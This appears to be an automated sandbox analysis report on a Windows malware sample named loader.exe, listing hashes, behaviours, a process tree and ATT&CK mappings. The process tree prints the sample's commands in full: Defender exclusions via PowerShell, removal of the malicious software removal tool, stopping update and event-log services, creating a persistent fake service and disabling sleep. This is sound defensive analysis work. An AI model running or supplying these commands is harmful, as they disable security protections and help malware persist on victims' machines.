Analysis
-
max time kernel
7s -
max time network
2s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
09/07/2024, 07:53
Static task
static1
Behavioral task
behavioral1
Sample
loader.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
loader.exe
Resource
win10v2004-20240704-en
General
-
Target
loader.exe
-
Size
16.3MB
-
MD5
edc8dc2a71af650c1c6272efa564adc3
-
SHA1
697581b70bf91793b76f61a60acec8fc764b1679
-
SHA256
18f456bc4bc4f55266f7456bfabe1f343560b6a59a3f5a68e995a34c0563a760
-
SHA512
5509c9d4bbd2ccc5d5bf432df572b7840091a7d7fd8365ceff5acb04d7ad728bd13e750d08d2216034a773e019c7a7a382eee96be8e0f69b1b98714e93a96fd8
-
SSDEEP
393216:8htgAGCnsGz3SN1Xg97zShawHV+Cck7hHV:+6AD53SbkzQawHb9pV
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2548 powershell.exe 652 powershell.exe -
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts Installer.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WindowsAutHost\ImagePath = "C:\\ProgramData\\WindowsServices\\WindowsAutHost" services.exe -
Executes dropped EXE 2 IoCs
pid Process 2780 4356897439864370634.exe 2840 Installer.exe -
Loads dropped DLL 5 IoCs
pid Process 2216 loader.exe 2216 loader.exe 1164 WerFault.exe 1164 WerFault.exe 1164 WerFault.exe -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 1992 powercfg.exe 1984 powercfg.exe 588 powercfg.exe 796 powercfg.exe 2428 powercfg.exe 344 powercfg.exe 2280 powercfg.exe 1712 powercfg.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe Installer.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2840 set thread context of 1588 2840 Installer.exe 56 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1284 sc.exe 2392 sc.exe 2880 sc.exe 3016 sc.exe 1480 sc.exe 1040 sc.exe 1740 sc.exe 2756 sc.exe 2908 sc.exe 1596 sc.exe 2880 sc.exe 608 sc.exe 2060 sc.exe 1868 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1164 2780 WerFault.exe 30 -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 2840 Installer.exe 2840 Installer.exe 2548 powershell.exe 2840 Installer.exe 2840 Installer.exe 2840 Installer.exe 2840 Installer.exe 2840 Installer.exe 2840 Installer.exe 2840 Installer.exe 2840 Installer.exe 2840 Installer.exe 2840 Installer.exe 2840 Installer.exe 2840 Installer.exe 1588 dialer.exe 1588 dialer.exe 1588 dialer.exe 1588 dialer.exe 2840 Installer.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 2548 powershell.exe Token: SeDebugPrivilege 2840 Installer.exe Token: SeShutdownPrivilege 1984 powercfg.exe Token: SeShutdownPrivilege 796 powercfg.exe Token: SeDebugPrivilege 1588 dialer.exe Token: SeShutdownPrivilege 588 powercfg.exe Token: SeShutdownPrivilege 2428 powercfg.exe -
Suspicious use of WriteProcessMemory 51 IoCs
description pid Process procid_target PID 2216 wrote to memory of 2780 2216 loader.exe 30 PID 2216 wrote to memory of 2780 2216 loader.exe 30 PID 2216 wrote to memory of 2780 2216 loader.exe 30 PID 2216 wrote to memory of 2780 2216 loader.exe 30 PID 2216 wrote to memory of 2840 2216 loader.exe 31 PID 2216 wrote to memory of 2840 2216 loader.exe 31 PID 2216 wrote to memory of 2840 2216 loader.exe 31 PID 2780 wrote to memory of 1164 2780 4356897439864370634.exe 32 PID 2780 wrote to memory of 1164 2780 4356897439864370634.exe 32 PID 2780 wrote to memory of 1164 2780 4356897439864370634.exe 32 PID 2780 wrote to memory of 1164 2780 4356897439864370634.exe 32 PID 3060 wrote to memory of 2864 3060 cmd.exe 39 PID 3060 wrote to memory of 2864 3060 cmd.exe 39 PID 3060 wrote to memory of 2864 3060 cmd.exe 39 PID 2840 wrote to memory of 1588 2840 Installer.exe 56 PID 2840 wrote to memory of 1588 2840 Installer.exe 56 PID 2840 wrote to memory of 1588 2840 Installer.exe 56 PID 2840 wrote to memory of 1588 2840 Installer.exe 56 PID 2840 wrote to memory of 1588 2840 Installer.exe 56 PID 2840 wrote to memory of 1588 2840 Installer.exe 56 PID 2840 wrote to memory of 1588 2840 Installer.exe 56 PID 1588 wrote to memory of 432 1588 dialer.exe 5 PID 1588 wrote to memory of 476 1588 dialer.exe 6 PID 1588 wrote to memory of 492 1588 dialer.exe 7 PID 1588 wrote to memory of 500 1588 dialer.exe 8 PID 1588 wrote to memory of 612 1588 dialer.exe 9 PID 1588 wrote to memory of 692 1588 dialer.exe 10 PID 1588 wrote to memory of 776 1588 dialer.exe 11 PID 1588 wrote to memory of 820 1588 dialer.exe 12 PID 1588 wrote to memory of 856 1588 dialer.exe 13 PID 1588 wrote to memory of 980 1588 dialer.exe 15 PID 1588 wrote to memory of 280 1588 dialer.exe 16 PID 1588 wrote to memory of 396 1588 dialer.exe 17 PID 1588 wrote to memory of 1080 1588 dialer.exe 18 PID 1588 wrote to memory of 1116 1588 dialer.exe 19 PID 1588 wrote to memory of 1176 1588 dialer.exe 20 PID 1588 wrote to memory of 1212 1588 dialer.exe 21 PID 1588 wrote to memory of 2024 1588 dialer.exe 23 PID 1588 wrote to memory of 1244 1588 dialer.exe 24 PID 1588 wrote to memory of 864 1588 dialer.exe 25 PID 1588 wrote to memory of 2284 1588 dialer.exe 26 PID 1588 wrote to memory of 3008 1588 dialer.exe 27 PID 1588 wrote to memory of 2840 1588 dialer.exe 31 PID 1588 wrote to memory of 1984 1588 dialer.exe 48 PID 1588 wrote to memory of 2428 1588 dialer.exe 49 PID 1588 wrote to memory of 796 1588 dialer.exe 50 PID 1588 wrote to memory of 588 1588 dialer.exe 51 PID 1588 wrote to memory of 700 1588 dialer.exe 52 PID 1588 wrote to memory of 1048 1588 dialer.exe 53 PID 1588 wrote to memory of 2520 1588 dialer.exe 55 PID 1588 wrote to memory of 2592 1588 dialer.exe 54
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:432
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Sets service image path in registry
PID:476 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:612
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:1244
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:864
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:692
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵PID:776
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:820
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1176
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵PID:856
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:980
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:280
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:396
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1080
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1116
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:2024
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2284
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:3008
-
-
C:\ProgramData\WindowsServices\WindowsAutHostC:\ProgramData\WindowsServices\WindowsAutHost2⤵PID:844
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:652
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1056
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:1940
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:1040
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2060
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:1740
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:1284
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:2392
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:2280
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:344
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
PID:1712
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
PID:1992
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:1724
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:2784
-
-
C:\Windows\system32\dialer.exedialer.exe3⤵PID:1232
-
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:492
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:500
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1212
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Users\Admin\AppData\Local\Temp\CHROME_SETUP\4356897439864370634.exe"C:\Users\Admin\AppData\Local\Temp\CHROME_SETUP\4356897439864370634.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 1084⤵
- Loads dropped DLL
- Program crash
PID:1164
-
-
-
C:\Users\Admin\AppData\Local\Temp\CHROME_SETUP\Installer.exe"C:\Users\Admin\AppData\Local\Temp\CHROME_SETUP\Installer.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵
- Drops file in Windows directory
PID:2864
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:1868
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:2880
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:2756
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:3016
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:608
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:796
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:588
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1588
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WindowsAutHost"4⤵
- Launches sc.exe
PID:1596
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WindowsAutHost" binpath= "C:\ProgramData\WindowsServices\WindowsAutHost" start= "auto"4⤵
- Launches sc.exe
PID:1480
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:2908
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WindowsAutHost"4⤵
- Launches sc.exe
PID:2880
-
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1931345662477974990-7173449931332575283-1665982043816384525-1468136141-1642227534"1⤵PID:700
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1148592147-455859060-112744601696925100-99071458918593316381423402522068681117"1⤵PID:1048
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1152149095-1942072496-11293801583495113507335219921105280871842252919738612257"1⤵PID:2592
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "607859106596361585489313496-1227635560-19565512531028571841-335847076-924547537"1⤵PID:2520
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Power Settings
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
665KB
MD55ea30ed7a18cb503c64c9589f415015a
SHA170d8f3cba897af921d246c7d90adce2f479328fd
SHA2561c0c5aabfd797fd5978df8e5b992946f6f3099b987629c20e77f3ef581579c65
SHA512b5b75eb6a37161e97372ca04839a53d35b2594941268e80442bb954c489e3611634900df322161792d6da80e51dadb9623760a4c93a022fc21e3eafce07dd1f1
-
Filesize
16.7MB
MD5e760e50cc4cb2488fd59a59a064ee1b1
SHA130c7f6c5ec103cd2847081f1fd10340f3157ff29
SHA2568f4c6d8591e9a44782191ceb7bc031f710e9d5e03bdf3353aa080bb58474cf2d
SHA512ac8018b0eb5ad05eb4921dd8c491118eadc9f02c70ee7e76d72849cde9630b3f0c89ccf7c3fabe9af1d589d5406f8accc5c446b5c584c19ff64bd62c6f87278e
-
Filesize
1KB
MD5f7892522ff70f44411dd60ed28638405
SHA1ab16eb12875ff707bb10949670a2b6d6659b41c5
SHA25632f44736ff15641ef054638c865384fcc4de2ac5bccc6bb123f19b55bd90d522
SHA512d4e5c97a84d5202044c2c7739a6a75ab6c4ff70efaed2af4789c9fcc278ce39b064f280de93a61b638b626ab40a25b1d110253244807704601456791c1384bdc